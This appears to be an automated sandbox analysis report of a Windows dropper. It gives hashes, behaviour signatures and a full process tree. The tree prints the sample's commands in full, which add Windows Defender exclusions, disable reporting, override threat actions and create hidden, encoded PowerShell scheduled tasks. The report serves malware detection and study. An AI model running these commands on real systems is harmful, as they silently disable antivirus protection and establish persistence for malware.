Analysis

  • max time kernel
    144s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2023 10:00

General

  • Target

    50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe

  • Size

    7.3MB

  • MD5

    612f6dd90f967a3230f12fda773c0f16

  • SHA1

    5b0eb0a9abb26e7f491747c5179c31141c987551

  • SHA256

    50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227

  • SHA512

    e9600a6557879bf05f18850d5cd826d6f21f513f74543dd5bd784891bf440e61844cdce79744ba869cda0ad858ec67966f7860d964ffdedace3de0f51a4e93f7

  • SSDEEP

    196608:91OFhVffir735nyYzDzR+zyjYTtsbtPHxVRJID+36hppT:3OFhxaBv4yjYTShpKCKBT

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 29 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe
    "C:\Users\Admin\AppData\Local\Temp\50ca6fd12a705a27d3fda13c4e6ba94c568acaac8b3bfd9bc18e8c7545cb1227.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Users\Admin\AppData\Local\Temp\7zSBDF1.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Users\Admin\AppData\Local\Temp\7zSC12D.tmp\Install.exe
        .\Install.exe /seexHdidU "385118" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4740
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1264
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2576
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2404
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3816
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4164
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1964
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:4852
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:464
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gEXqSONui" /SC once /ST 09:21:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:3344
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gEXqSONui"
                  4⤵
                    PID:1976
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gEXqSONui"
                    4⤵
                      PID:1808
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "buPbzvACkYlCJXJqLy" /SC once /ST 10:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\UUFdcpkSRidElAc\EzxaCzy.exe\" Tp /yCsite_ideyd 385118 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:3032
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4076
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:2316
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                  1⤵
                    PID:1676
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                    1⤵
                      PID:3988
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:2528
                      • C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\UUFdcpkSRidElAc\EzxaCzy.exe
                        C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\UUFdcpkSRidElAc\EzxaCzy.exe Tp /yCsite_ideyd 385118 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:1648
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4604
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4820
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:4548
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:1340
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:4580
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:3080
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:1420
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:1668
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:2432
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:2488
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:2336
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4008
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:3492
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:5108
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:4612
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:2300
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:5028
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:1776
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:2464
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:2420
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:464
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:3816
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:3092
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:4920
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:4164
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:4128
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                              PID:1472
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:2176
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:488
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:4980
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EdkISHpRcryaC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EdkISHpRcryaC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gkfvnfqNCFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gkfvnfqNCFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ltepJsludpEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ltepJsludpEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vfgYgydlU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vfgYgydlU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cbVeFIwlhYiFKdVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cbVeFIwlhYiFKdVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yqVNydvJdnVKJAcs\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yqVNydvJdnVKJAcs\" /t REG_DWORD /d 0 /reg:64;"
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3844
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EdkISHpRcryaC" /t REG_DWORD /d 0 /reg:32
                                                                                    3⤵
                                                                                      PID:3124
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EdkISHpRcryaC" /t REG_DWORD /d 0 /reg:64
                                                                                      3⤵
                                                                                        PID:4928
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR" /t REG_DWORD /d 0 /reg:32
                                                                                        3⤵
                                                                                          PID:4316
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR" /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:4444
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gkfvnfqNCFUn" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:3496
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gkfvnfqNCFUn" /t REG_DWORD /d 0 /reg:64
                                                                                              3⤵
                                                                                                PID:3776
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ltepJsludpEU2" /t REG_DWORD /d 0 /reg:32
                                                                                                3⤵
                                                                                                  PID:2000
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ltepJsludpEU2" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:232
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vfgYgydlU" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:1052
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vfgYgydlU" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:2936
